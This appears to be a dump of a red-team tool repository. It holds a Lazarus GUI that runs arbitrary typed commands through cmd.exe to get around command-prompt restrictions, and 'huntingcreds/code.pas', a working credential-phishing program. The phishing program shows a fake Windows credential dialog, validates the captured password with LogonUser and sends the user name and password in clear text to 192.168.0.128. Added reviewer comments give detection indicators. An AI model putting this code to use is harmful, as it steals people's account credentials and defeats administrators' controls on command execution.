├── README.md ├── T1121 ├── README.MD └── regasm.dll ├── cmd-bypass-tool ├── project1.lpi ├── project1.lpr ├── project1.res ├── readme.md ├── unit1.lfm └── unit1.pas ├── huntingcreds └── code.pas ├── imgs ├── DNS-Cat.png └── README └── red team ops- mind map.pdf /README.md: -------------------------------------------------------------------------------- 1 | # 0xsp 2 | 3 | all tools discussed on 0xsp.com will be shared in this main repo 4 | -------------------------------------------------------------------------------- /T1121/README.MD: -------------------------------------------------------------------------------- 1 | . 2 | -------------------------------------------------------------------------------- /T1121/regasm.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zux0x3a/0xsp/fc385510b2c138da716c0b49e0387e172c4ffa1a/T1121/regasm.dll -------------------------------------------------------------------------------- /cmd-bypass-tool/project1.lpi: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | <Scaled Value="True"/> 11 | <ResourceType Value="res"/> 12 | <UseXPManifest Value="True"/> 13 | <XPManifest> 14 | <DpiAware Value="True"/> 15 | </XPManifest> 16 | </General> 17 | <BuildModes Count="3"> 18 | <Item1 Name="Default" Default="True"/> 19 | <Item2 Name="Debug"> 20 | <CompilerOptions> 21 | <Version Value="11"/> 22 | <PathDelim Value="\"/> 23 | <Target> 24 | <Filename Value="project1"/> 25 | </Target> 26 | <SearchPaths> 27 | <IncludeFiles Value="$(ProjOutDir)"/> 28 | <UnitOutputDirectory Value="lib\$(TargetCPU)-$(TargetOS)"/> 29 | </SearchPaths> 30 | <Parsing> 31 | <SyntaxOptions> 32 | <IncludeAssertionCode Value="True"/> 33 | </SyntaxOptions> 34 | </Parsing> 35 | <CodeGeneration> 36 | <Checks> 37 | <IOChecks Value="True"/> 38 | <RangeChecks Value="True"/> 39 | <OverflowChecks Value="True"/> 40 | <StackChecks Value="True"/> 
41 | </Checks> 42 | <VerifyObjMethodCallValidity Value="True"/> 43 | </CodeGeneration> 44 | <Linking> 45 | <Debugging> 46 | <DebugInfoType Value="dsDwarf2Set"/> 47 | <UseHeaptrc Value="True"/> 48 | <TrashVariables Value="True"/> 49 | <UseExternalDbgSyms Value="True"/> 50 | </Debugging> 51 | <Options> 52 | <Win32> 53 | <GraphicApplication Value="True"/> 54 | </Win32> 55 | </Options> 56 | </Linking> 57 | </CompilerOptions> 58 | </Item2> 59 | <Item3 Name="Release"> 60 | <CompilerOptions> 61 | <Version Value="11"/> 62 | <PathDelim Value="\"/> 63 | <Target> 64 | <Filename Value="project1"/> 65 | </Target> 66 | <SearchPaths> 67 | <IncludeFiles Value="$(ProjOutDir)"/> 68 | <UnitOutputDirectory Value="lib\$(TargetCPU)-$(TargetOS)"/> 69 | </SearchPaths> 70 | <CodeGeneration> 71 | <SmartLinkUnit Value="True"/> 72 | <Optimizations> 73 | <OptimizationLevel Value="3"/> 74 | </Optimizations> 75 | </CodeGeneration> 76 | <Linking> 77 | <Debugging> 78 | <GenerateDebugInfo Value="False"/> 79 | </Debugging> 80 | <LinkSmart Value="True"/> 81 | <Options> 82 | <Win32> 83 | <GraphicApplication Value="True"/> 84 | </Win32> 85 | </Options> 86 | </Linking> 87 | </CompilerOptions> 88 | </Item3> 89 | </BuildModes> 90 | <PublishOptions> 91 | <Version Value="2"/> 92 | <UseFileFilters Value="True"/> 93 | </PublishOptions> 94 | <RunParams> 95 | <FormatVersion Value="2"/> 96 | <Modes Count="0"/> 97 | </RunParams> 98 | <RequiredPackages Count="2"> 99 | <Item1> 100 | <PackageName Value="FCL"/> 101 | </Item1> 102 | <Item2> 103 | <PackageName Value="LCL"/> 104 | </Item2> 105 | </RequiredPackages> 106 | <Units Count="2"> 107 | <Unit0> 108 | <Filename Value="project1.lpr"/> 109 | <IsPartOfProject Value="True"/> 110 | </Unit0> 111 | <Unit1> 112 | <Filename Value="unit1.pas"/> 113 | <IsPartOfProject Value="True"/> 114 | <ComponentName Value="Form1"/> 115 | <HasResources Value="True"/> 116 | <ResourceBaseClass Value="Form"/> 117 | <UnitName Value="Unit1"/> 118 | </Unit1> 119 | </Units> 120 | 
</ProjectOptions>
<CompilerOptions>
  <Version Value="11"/>
  <PathDelim Value="\"/>
  <Target>
    <Filename Value="project1"/>
  </Target>
  <SearchPaths>
    <IncludeFiles Value="$(ProjOutDir)"/>
    <UnitOutputDirectory Value="lib\$(TargetCPU)-$(TargetOS)"/>
  </SearchPaths>
  <Linking>
    <Options>
      <Win32>
        <GraphicApplication Value="True"/>
      </Win32>
    </Options>
  </Linking>
</CompilerOptions>
<Debugging>
  <Exceptions Count="3">
    <Item1>
      <Name Value="EAbort"/>
    </Item1>
    <Item2>
      <Name Value="ECodetoolError"/>
    </Item2>
    <Item3>
      <Name Value="EFOpenError"/>
    </Item3>
  </Exceptions>
</Debugging>
</CONFIG>

--------------------------------------------------------------------------------
/cmd-bypass-tool/project1.lpr:
--------------------------------------------------------------------------------
// Program entry point for the cmd-bypass-tool GUI.
// It only sets up the LCL application object, creates the single form
// (TForm1, declared in Unit1) and hands control to Application.Run.
// All command execution happens in Unit1, not in this file.
program project1;

{$mode objfpc}{$H+}

uses
  {$IFDEF UNIX}{$IFDEF UseCThreads}
  cthreads,
  {$ENDIF}{$ENDIF}
  Interfaces, // this includes the LCL widgetset
  Forms, Unit1
  { you can add units after this };

{$R *.res}

begin
  RequireDerivedFormResource:=True;
  Application.Scaled:=True;
  Application.Initialize;
  // Form1 is the global form variable exported by Unit1.
  Application.CreateForm(TForm1, Form1);
  Application.Run;
end.


--------------------------------------------------------------------------------
/cmd-bypass-tool/project1.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zux0x3a/0xsp/fc385510b2c138da716c0b49e0387e172c4ffa1a/cmd-bypass-tool/project1.res
--------------------------------------------------------------------------------
/cmd-bypass-tool/readme.md:
--------------------------------------------------------------------------------
.
--------------------------------------------------------------------------------
/cmd-bypass-tool/unit1.lfm:
--------------------------------------------------------------------------------
object Form1: TForm1
  Left = 321
  Height = 419
  Top = 266
  Width = 633
  BorderStyle = bsSingle
  Caption = 'Bypass CMD restrication'
  ClientHeight = 419
  ClientWidth = 633
  DesignTimePPI = 120
  OnCreate = FormCreate
  LCLVersion = '2.0.6.0'
  object Button1: TButton
    Left = 464
    Height = 31
    Top = 342
    Width = 94
    Caption = 'send '
    OnClick = Button1Click
    TabOrder = 0
  end
  object Edit1: TEdit
    Left = 16
    Height = 28
    Top = 343
    Width = 432
    TabOrder = 1
  end
  object Memo1: TMemo
    Left = 8
    Height = 312
    Top = 16
    Width = 608
    Lines.Strings = (
      'command prompt output'
    )
    ScrollBars = ssAutoBoth
    TabOrder = 2
  end
  object Label1: TLabel
    Left = 16
    Height = 20
    Top = 383
    Width = 110
    Caption = 'https://0xsp.com'
    ParentColor = False
  end
end
--------------------------------------------------------------------------------
/cmd-bypass-tool/unit1.pas:
--------------------------------------------------------------------------------
// Reviewer summary.
// GUI front end that takes the text typed into Edit1, prefixes it with
// 'cmd.exe /c ', starts it through TProcess with piped output and shows the
// captured output in Memo1. The form caption describes the purpose as
// bypassing a command-prompt restriction; which restriction is meant is not
// stated anywhere on this page.
//
// Defender view: the child process is still cmd.exe. Process-creation
// telemetry (Security event 4688 with command-line auditing, or Sysmon
// Event ID 1) records it with this executable as the parent and the typed
// command on the command line. A control that only blocks the interactive
// console window does not cover a child started this way; allow-listing
// which executables may run (application control) does.
unit Unit1;

{$mode objfpc}{$H+}

interface

uses
  Classes,windows, SysUtils, process, Forms, Controls, Graphics, Dialogs, StdCtrls;


const
  // Size in bytes of the chunk buffer used when draining the child's stdout.
  buf_size = 2024;
type

  { TForm1 }

  // Single application form: Edit1 holds the command text, Button1 submits
  // it, Memo1 receives the output. Label1 is static text (see unit1.lfm).
  TForm1 = class(TForm)
    Button1: TButton;
    Edit1: TEdit;
    Label1: TLabel;
    Memo1: TMemo;
    procedure Button1Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private

  public

  end;

var
  Form1: TForm1;

implementation

{$R *.lfm}

{ TForm1 }
// Returns the Windows system directory as reported by GetSystemDirectory.
// Result is first sized to MAX_PATH characters to serve as the API buffer,
// then shortened to the length the API returns.
function SystemFolder: string;
begin
  SetLength(Result, Windows.MAX_PATH);
  SetLength(
    Result, Windows.GetSystemDirectory(PChar(Result), Windows.MAX_PATH)
  );
end;
// Starts a child process for the command line in cmd, reads its standard
// output to the end and loads that output into Form1.Memo1.
//   cmd - full command line, assigned to TProcess.CommandLine as is.
//   arg - not used by the body.
// The function never assigns Result; callers in this unit ignore it.
// The locals output and list are declared but not used.
function runit(cmd:string;arg:string):string;
var
  process : Tprocess;
  output: string;
  list : Tstringlist;
  OutputStream : TStream;
  BytesRead : longint;
  Buffer : array[1..BUF_SIZE] of byte;

begin

  process := Tprocess.Create(nil);
  OutputStream := TMemoryStream.Create; // we are going to store outputs as memory stream .
  // NOTE(review): OutputStream is not freed anywhere in this function.
  process.Executable:=systemfolder+'\cmd.exe';
  // NOTE(review): CommandLine is set after Executable; which of the two
  // TProcess uses to locate the image is not visible here - confirm.
  process.CommandLine:=cmd; // we can add value of arg into params to control plugin output
  try
    // poUsePipes redirects the child's standard handles so Output can be read below.
    process.Options:= [poUsePipes];
    process.Execute;
    repeat
      // Get the new data from the process to a maximum of the buffer size that was allocated.
      // Note that all read(...) calls will block except for the last one, which returns 0 (zero).
      BytesRead := Process.Output.Read(Buffer, BUF_SIZE);
      OutputStream.Write(Buffer, BytesRead)
    until BytesRead = 0; // stop when no more data is being received

    // Rewind before loading, otherwise LoadFromStream would start at the end.
    outputstream.Position:=0;
    form1.Memo1.Lines.LoadFromStream(outputstream); // add output into Memo component


  finally
    process.Free;
  end;
end;
// Click handler for the "send" button: passes 'cmd.exe /c ' followed by the
// raw contents of Edit1 to runit. The text is not validated or quoted.
procedure TForm1.Button1Click(Sender: TObject);
var
  cmd_s:string;
begin
  cmd_s := 'cmd.exe /c ';
  runit(cmd_s+edit1.Text,'');
end;

// OnCreate handler wired in unit1.lfm; intentionally empty.
procedure TForm1.FormCreate(Sender: TObject);
begin

end;

end.
--------------------------------------------------------------------------------
/huntingcreds/code.pas:
--------------------------------------------------------------------------------
// Reviewer summary.
// This unit is a credential-phishing demonstration (MITRE ATT&CK T1056.002,
// GUI Input Capture). Button1Click shows the Windows credential dialog via
// CredHunt, checks what the user typed with LogonUser, and then passes the
// user name and password to sendevil, which issues an HTTP GET through
// WinINet to the hard-coded host 192.168.0.128.
//
// Observable behaviour, for detection and response:
//   * A process that has no reason to ask for credentials loads credui.dll
//     and resolves CredUIPromptForWindowsCredentials at run time
//     (image-load telemetry such as Sysmon Event ID 7).
//   * Each submission triggers a LogonUser call with LOGON32_LOGON_NETWORK.
//     With logon auditing enabled this typically appears in the Security
//     log as event 4624 (success) or 4625 (failure) with Logon Type 3,
//     attributed to this process.
//   * The outbound request is plain HTTP, its URL contains the user name and
//     password in clear text, and it carries the User-Agent
//     'Mozilla/5.0(compatible; WinInet)'. Proxy and IDS logs will show both.
//   * Any account whose password was typed into such a prompt should be
//     treated as compromised and its credentials rotated.
unit code;



interface

uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls,wininet;

type
  // Form with two buttons; only Button1 has a handler declared in this unit.
  TForm1 = class(TForm)
    Button1: TButton;
    Button2: TButton;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

// Performs an HTTP GET of Url through WinINet and returns the response body.
//   Url - full URL; passed unchanged to InternetOpenUrl.
// Returns the concatenated response bytes, each chunk taken as UTF8String.
// Raises Exception when InternetOpen fails. When the URL cannot be opened
// it writes a message with writeln and returns the empty string.
// In this unit the function is the exfiltration channel: the caller places
// the captured credentials inside Url.
function sendevil(const Url: string): string;
var
  NetHandle: HINTERNET;
  UrlHandle: HINTERNET;
  Buffer: array[0..1023] of Byte;
  BytesRead: dWord;
  StrBuffer: UTF8String;
begin
  Result := '';
  BytesRead := Default(dWord);
  // INTERNET_OPEN_TYPE_PRECONFIG makes WinINet use the system proxy settings.
  // The user-agent string is fixed and has no space before '(' - a usable
  // network indicator.
  NetHandle := InternetOpen('Mozilla/5.0(compatible; WinInet)', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);

  // NetHandle valid?
  if Assigned(NetHandle) then
    Try
      // INTERNET_FLAG_RELOAD forces a fetch from the server instead of the cache.
      UrlHandle := InternetOpenUrl(NetHandle, PChar(Url), nil, 0, INTERNET_FLAG_RELOAD, 0);

      // UrlHandle valid?
      if Assigned(UrlHandle) then
        Try
          // Read 1024-byte chunks until a read reports zero bytes.
          repeat
            InternetReadFile(UrlHandle, @Buffer, SizeOf(Buffer), BytesRead);
            SetString(StrBuffer, PAnsiChar(@Buffer[0]), BytesRead);
            Result := Result + StrBuffer;
          until BytesRead = 0;
        Finally
          InternetCloseHandle(UrlHandle);
        end
      // o/w UrlHandle invalid
      else
        writeln('Cannot open URL: ' + Url);
    Finally
      InternetCloseHandle(NetHandle);
    end
  // NetHandle invalid
  else
    raise Exception.Create('Unable to initialize WinInet');
end;




// Shows the Windows credential dialog and returns what the user entered.
//   ACaption, ADescription - caption and message text shown in the dialog.
//   AAuthError             - passed through as dwAuthError.
//   AUser, APassword, ADomain - receive the unpacked values on success.
//   ASavePassword          - its address is passed as the checkbox state.
// Returns True when the dialog returned NO_ERROR and the authentication
// buffer was unpacked, False when the user cancelled (ERROR_CANCELLED).
// Raises Exception('failed') for any other dialog result, and calls
// RaiseLastOSError when either export cannot be resolved. If credui.dll
// cannot be loaded the body is skipped and Result is not assigned.
//
// Both APIs are resolved at run time with GetProcAddress rather than
// linked statically, so they do not appear in the import table; detection
// has to rely on the module load and on the dialog itself.
function CredHunt(const Acaption,ADescription :string;
  AAuthError: Cardinal; var Auser,Apassword,Adomain:string;
  var ASavePassword: Boolean):Boolean;
type

  // Local declaration of the record passed to the prompt API as pUiInfo.
  PCredUIInfo = ^TCredUIInfo;
  TCredUIInfo = record
    cbSize : DWORD;
    hwndParent : HWND;
    pszMessageText : PChar;
    pszCaptionText : Pchar;
    hbmBanner : HBITMAP;

  end;

const

  CRED_MAX_USERNAME_LENGTH = 256;
  CREDUI_MAX_PASSWORD_LENGTH = 256;
  CRED_MAX_DOMAIN_TARGET_NAME_LENGTH = 256;

  cred = 'credui.dll';

  // Export names: the W or A variant is chosen at compile time.
  CredUIPromptForWindowsCredentialsName = {$IFDEF UNICODE}
    'CredUIPromptForWindowsCredentialsW'
  {$ELSE}
    'CredUIPromptForWindowsCredentialsA'
  {$ENDIF};
  CredUnPackAuthenticationBufferName = {$IFDEF UNICODE}
    'CredUnPackAuthenticationBufferW'
  {$ELSE}
    'CredUnPackAuthenticationBufferA'
  {$ENDIF};
  // Dialog flags. Only CREDUIWIN_GENERIC and CREDUIWIN_CHECKBOX are passed
  // below; the others, including CREDUIWIN_SECURE_PROMPT, are declared but
  // not used.
  CREDUIWIN_GENERIC = $00000001;
  CREDUIWIN_CHECKBOX = $00000002;
  CREDUIWIN_AUTHPACKAGE_ONLY = $00000010;
  CREDUIWIN_IN_CRED_ONLY = $00000020;
  CREDUIWIN_ENUMERATE_ADMINS = $00000100;
  CREDUIWIN_ENUMERATE_CURRENT_USER = $00000200;
  CREDUIWIN_SECURE_PROMPT = $00001000;
  CREDUIWIN_PACK_32_WOW = $10000000;

var
  lib : HMODULE;
  // Function-pointer variables filled from GetProcAddress.
  CredUIPromptForWindowsCredentials: function (
    var pUiInfo : TCredUIInfo;dwAuthError:DWORD; var pulAuthPackage:ULONG;pvInAuthBuffer:PCardinal;ulInAuthBufferSize:ULONG;
    out ppvOutAuthBuffer: Cardinal; out pulOutAuthBufferSize: ULONG;
    pfsave: PVOID; dwFlags:DWORD): DWORD; stdcall;

  CredUnPackAuthenticationBuffer: function (dwFlags:DWORD;pAuthBuffer:PVOID;cbAuthBuffer:DWORD;pszUserName:LPSTR;
    var pcchlMaxUserName:DWORD; pszDomainName:LPSTR; var pcchMaxDomainName:DWORD;pszPassword:LPSTR; var pcchMaxPassword:DWORD
    ): LONGBOOL; stdcall;

  CredInfo : TCredUIInfo;
  lAuthPackage : ULONG;
  lMaxUsername,lMaxDomainName,lMaxPassword:Dword;
  user,password :string;
  lUsername,lPassword,lDomain : array [Byte] of Char;
  loutbuffer : Cardinal;
  loutbuffersize : DWord;


begin
  lib := safeloadlibrary(cred);
  if Lib <> 0 then

  try
    CredUIPromptForWindowsCredentials := GetProcAddress(lib,CredUIPromptForWindowsCredentialsName);
    CredUnPackAuthenticationBuffer := GetProcAddress(lib,CredUnPackAuthenticationBufferName);

    if assigned(CredUIPromptForWindowsCredentials) and assigned(CredUnPackAuthenticationBuffer) then
    begin
      Fillchar(CredInfo, sizeof(CredInfo),0);
      CredInfo.cbsize := sizeof(Credinfo);

      // Parent the dialog to the focused form, else the active form, else no owner.
      if screen.FocusedForm <> nil then
        credinfo.hwndParent := screen.FocusedForm.Handle
      else
      if screen.Activeform <> nil then
        credinfo.hwndParent := screen.activeform.Handle
      else
        Credinfo.hwndParent := 0;

      // Caption and message are whatever the caller supplies.
      Credinfo.pszCaptionText := Pchar(ACaption);
      Credinfo.pszMessageText := Pchar(ADescription);

      lAuthPackage := 0;


      case CredUIPromptForWindowsCredentials(
        CredInfo,AAuthError,lAuthPackage,nil,0,lOutBuffer,lOutBufferSize,@ASavePassword,CREDUIWIN_GENERIC or CREDUIWIN_CHECKBOX) of

        NO_ERROR: begin
          Zeromemory(@lusername,sizeof(lusername));
          Zeromemory(@lPassword,sizeof(lpassword));
          zeromemory(@lDomain,sizeof(lDomain));
          // Unpack the opaque buffer returned by the dialog into the
          // user name, domain and password character arrays.
          Result := CredUnPackAuthenticationBuffer(0,pointer(loutbuffer),loutbuffersize,
            @lusername,lMaxUsername,
            @lDomain,lMaxDomainname,
            @lpassword,lMaxPassword);
          if result then
          begin
            // The password leaves this function as an ordinary string.
            Auser := string(lusername);
            Apassword := string(lpassword);
            ADomain := string(lDomain);
            result := true;
          end;

        end;
        ERROR_CANCELLED:
          result := false;
        else
          raise exception.Create('failed');
      end;
    end else
      RaiseLastOSError;
  finally
    FreeLibrary(lib);
  end;



end;


// Click handler: prompt, validate, report.
// 1. CredHunt shows the credential dialog with caption and text 'test';
//    the handler exits if it returns False.
// 2. LogonUser is called with the entered user name and password, a nil
//    domain and LOGON32_LOGON_NETWORK, to learn whether the pair is valid.
// 3. sendevil is called with a URL on 192.168.0.128 whose path starts with
//    'failed ' or 'success ' and continues with the user name, the literal
//    'pass=' and the password, all unencoded and over plain HTTP.
// The domain and savepassword values returned by CredHunt are not used.
procedure TForm1.Button1Click(Sender: TObject);
var
  username,password,domain:string;
  savepassword:boolean;
  TOKEN : Thandle;
begin

  if not CredHunt('test','test',$0,username,password,domain,savePassword)
  then
    exit;
  if not Logonuser(@username[1],nil,@password[1],LOGON32_LOGON_NETWORK,LOGON32_PROVIDER_DEFAULT,TOKEN) then

    sendevil('http://192.168.0.128/failed '+username+'pass='+password)
  else
    sendevil('http://192.168.0.128/success '+username+'pass=' +password);
end;


end.

--------------------------------------------------------------------------------
/imgs/DNS-Cat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zux0x3a/0xsp/fc385510b2c138da716c0b49e0387e172c4ffa1a/imgs/DNS-Cat.png
--------------------------------------------------------------------------------
/imgs/README:
--------------------------------------------------------------------------------
.
2 | -------------------------------------------------------------------------------- /red team ops- mind map.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zux0x3a/0xsp/fc385510b2c138da716c0b49e0387e172c4ffa1a/red team ops- mind map.pdf --------------------------------------------------------------------------------